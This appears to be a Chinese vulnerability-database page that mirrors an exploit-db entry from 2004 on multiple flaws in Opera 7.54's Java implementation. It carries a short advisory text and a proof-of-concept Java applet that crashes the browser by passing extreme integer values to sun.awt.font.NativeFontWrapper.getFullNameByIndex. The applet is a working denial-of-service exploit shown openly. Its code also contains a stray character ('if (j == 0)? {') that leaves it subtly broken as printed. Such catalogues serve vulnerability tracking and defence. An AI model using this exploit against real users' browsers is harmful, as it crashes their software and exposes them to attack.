Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054761 漏洞类型
发布时间 2004-11-19 更新时间 2004-11-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24755
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11712/info

Multiple remote vulnerabilities reportedly affect the Opera Web Browser Java implementation. These issues are due to the insecure proprietary design of the Web browser's Java implementation.

These issues may allow an attacker to craft a Java applet that violate Sun's Java secure programming guidelines.

These issues may be leveraged to carry out a variety of unspecified attacks including sensitive information disclosure and denial of service attacks. Any successful exploitation would take place with the privileges of the user running the affected browser application.

Although only version 7.54 is reportedly vulnerable, it is likely that earlier versions are vulnerable to these issues as well.

import sun.awt.font.*;

public class Opera754FontCrashApplet extends java.applet.Applet{

	public void start() {
		int j =
		javax.swing.JOptionPane.showConfirmDialog(null,"Illegalaccess.org | Step1 Opera 754 FontCrash, wanna crash? ");
		if (j == 0)? {
			NativeFontWrapper.getFullNameByIndex(Integer.MIN_VALUE);
			NativeFontWrapper.getFullNameByIndex(Integer.MAX_VALUE);
		}
	}
}